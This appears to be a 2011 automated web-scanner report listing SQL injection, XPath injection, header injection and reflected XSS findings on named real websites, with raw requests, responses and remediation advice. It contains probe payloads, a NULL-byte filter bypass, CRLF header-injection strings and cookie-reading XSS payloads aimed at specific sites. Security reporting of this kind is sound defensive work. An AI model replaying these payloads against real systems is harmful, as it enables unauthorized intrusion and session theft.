SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The ltcid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ltcid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1 Host: lt.navegg.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ltcid=547362597'
Response 1
HTTP/1.1 500 Internal Server Error P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Content-Type: text/html Content-Length: 369 Date: Wed, 19 Jan 2011 18:01:20 GMT Server: lighttpd/1.4.19
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
Request 2
GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1 Host: lt.navegg.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ltcid=547362597''
Response 2
HTTP/1.1 200 OK P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 20-Jan-2011 06:01:21 GMT Content-type: application/javascript Date: Wed, 19 Jan 2011 18:01:21 GMT Server: lighttpd/1.4.19 Content-Length: 45
The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sc.lt?id=' HTTP/1.1 Host: navegg.boo-box.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Content-Type: text/html Content-Length: 369 Date: Wed, 19 Jan 2011 18:09:52 GMT Server: lighttpd/1.4.19
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
Request 2
GET /sc.lt?id='' HTTP/1.1 Host: navegg.boo-box.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Set-Cookie: inf=''_0_0_0_0_0_0_0-0-0-0-0; path=/; domain=.boo-box.com; expires=Wed, 19-Jan-2012 12:09:52 GMT Content-type: application/javascript Date: Wed, 19 Jan 2011 18:09:52 GMT Server: lighttpd/1.4.19 Content-Length: 23
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /image/special2.jpg HTTP/1.1 Host: v6test.cdn.att.net Proxy-Connection: keep-alive Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00' Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found Date: Wed, 19 Jan 2011 16:50:03 GMT Last-Modified: Wed, 19 Jan 2011 16:50:03 GMT Server: Sun-ONE-Web-Server/6.1 Content-Length: 5532 Content-Type: text/html X-Cache: MISS from 12.120.38.41 Age: 35 X-Cache: HIT from 12.120.79.21 Via: 1.1 12.120.38.41:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.21:80 (cache/2.6.2.2.16.ATT) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>AT&a ...[SNIP]... <strong>http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys</strong> ...[SNIP]...
Request 2
GET /image/special2.jpg HTTP/1.1 Host: v6test.cdn.att.net Proxy-Connection: keep-alive Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'' Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Date: Wed, 19 Jan 2011 16:49:53 GMT Last-Modified: Wed, 19 Jan 2011 16:49:53 GMT Server: Sun-ONE-Web-Server/6.1 Content-Length: 5422 Content-Type: text/html X-Cache: HIT from 12.120.38.42 Age: 45 X-Cache: HIT from 12.120.79.20 Via: 1.1 12.120.38.42:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.20:80 (cache/2.6.2.2.16.ATT) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>AT&a ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /showoffice.aspx HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
Response 1 (redirected)
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:48:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=og0sit55134r4kyfq5mdkl3n; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 25
500 Internal Server Error
Request 2
GET /showoffice.aspx HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found Connection: close Date: Wed, 19 Jan 2011 15:48:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=cjknstzb1jhxzoedkedo5kji; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 56279
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]...
The FUSEACTION parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the FUSEACTION parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?FUSEACTION=home.299'&pf=y HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:48:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The article_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the article_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=news.detail&article_id=9405'&site_id=286 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The emp_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emp_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=attorneys.detail&site_id=299&emp_id=377' HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=seminars.detail&eventID=5575'&site_id=492 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:51:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The fuseaction parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fuseaction parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=home.285' HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
The site_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the site_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /index.cfm?fuseaction=news.site&site_id=299' HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Wed, 19 Jan 2011 15:49:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server-error: true Content-Type: text/html; charset=UTF-8
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application appears to be using the ASP.NET XPath APIs.
Request
GET /FCWSite'/Img HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<html> <head> <title>This is an unclosed string.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family ...[SNIP]... </b>System.Xml.XPath.XPathException: This is an unclosed string.<br> ...[SNIP]... <pre>
[XPathException: This is an unclosed string.] MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289 MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503 MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application appears to be using the ASP.NET XPath APIs.
Request
GET /FCWSite/Img' HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<html> <head> <title>This is an unclosed string.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family ...[SNIP]... </b>System.Xml.XPath.XPathException: This is an unclosed string.<br> ...[SNIP]... <pre>
[XPathException: This is an unclosed string.] MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289 MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503 MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705 MS.Internal.Xml.XPath. ...[SNIP]...
3. HTTP header injection
There are 3 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 2 is copied into the Location response header. The payload acc91%0d%0af14ecc46de1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /files/acc91%0d%0af14ecc46de1 HTTP/1.1 Host: accuserve.homestead.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/5.0 Date: Wed, 19 Jan 2011 15:20:44 GMT Location: /files/acc91 f14ecc46de1/
The value of the $ request parameter is copied into the Set-Cookie response header. The payload 99487%0d%0a1735d591256 was submitted in the $ parameter. This caused a response containing an injected HTTP header.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=99487%0d%0a1735d591256&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:99487 1735d591256;expires=Thu, 20 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:54 GMT;path=/;domain=.zedo.com; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=533 Expires: Wed, 19 Jan 2011 18:09:47 GMT Date: Wed, 19 Jan 2011 18:00:54 GMT Connection: close Content-Length: 2018
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',99487 1735 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload fab80%0d%0a7b239144ac4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /deals/socialads_reflectorfab80%0d%0a7b239144ac4 HTTP/1.1 Host: livingsocial.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 19 Jan 2011 18:10:17 GMT Content-Type: text/html Content-Length: 178 Connection: close Location: http://partners.livingsocial.com/deals/socialads_reflectorfab80 7b239144ac4
<html> <head><title>301 Moved Permanently</title></head> <body bgcolor="white"> <center><h1>301 Moved Permanently</h1></center> <hr><center>nginx</center> </body> </html>
4. Cross-site scripting (reflected)
There are 347 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
